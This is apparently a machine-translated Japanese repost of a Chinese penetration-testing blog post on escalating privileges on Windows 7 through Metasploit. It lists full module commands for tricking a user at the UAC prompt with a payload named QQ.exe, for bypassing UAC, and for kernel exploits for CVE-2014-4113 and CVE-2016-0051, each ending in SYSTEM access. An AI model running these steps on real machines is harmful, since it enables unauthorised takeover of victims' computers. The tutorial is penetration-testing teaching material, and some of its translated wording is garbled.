UACエスカレーション

UACクリックして権利を引き上げる

  1. getuidコマンドを使用すると、通常のユーザーであることが判明し、システム権限を取得しようとして失敗しました
    ここに画像の説明を挿入します
  2. ここでは、別のmsfエクスプロイトモジュールを使用します
background
back
use exploit/windows/local/ask
info
show options
set session 3
set filename QQ.exe
run

ここに画像の説明を挿入します

  • 注:ここで、セッションのIDは権限の低いアカウントのID番号であることを説明します。
  • 右のエスカレーションが成功したら、getsystemコマンドを使用して右のエスカレーションを正常にエスカレーションします
  • この方法では、ユーザーはUACダイアログボックスで[はい]をクリックする必要があります。コンピューターのセキュリティについて少し知識がある人は、この操作が非常に疑わしいと感じるでしょう。この方法は、セキュリティ意識が弱いユーザーのみを対象としています。したがって、UACをバイパスする直接の言及は次のようになります。以下に紹介します。右

UACは特権昇格をバイパスします

  1. msfのbypassuacモジュールを使用して、uac認証をバイパスします
use exploit/windows/local/bypassuac
set session 5
exploit

ここに画像の説明を挿入します
ここに画像の説明を挿入します
直接の特権昇格は、ユーザーの操作なしで成功します

特権昇格の抜け穴を使用して特権を昇格する

  1. CVE-2014-4113の脆弱性である特権昇格にWindowsシステムの脆弱性ms14_058_track_popup_menuを使用する
back
use exploit/windows/local/ms14_058_track_popup_menu
exploit
  • 攻撃が完了すると、アクセス許可がすでにシステムアクセス許可になっていることがわかります
    ここに画像の説明を挿入します
  1. 実際、Windows7で悪用される可能性のある脆弱性は非常に多く、CVE-2016-0051の脆弱性であるms16_016_webdavもあります。
use exploit/windows/local/ms16_016_webdav
set session 4
exploit

ここに画像の説明を挿入します

概要:実際、Windowsシステムには毎年多くのローカル特権昇格の脆弱性があります。セキュリティ意識が高い場合はパッチが適用されるユーザーもいますが、個人の過失は排除されません。通常のユーザーにスーパーに昇格させる特権管理者はそれぞれ侵入テスターの究極の目標です!

おすすめ

転載: blog.csdn.net/weixin_45007073/article/details/112907954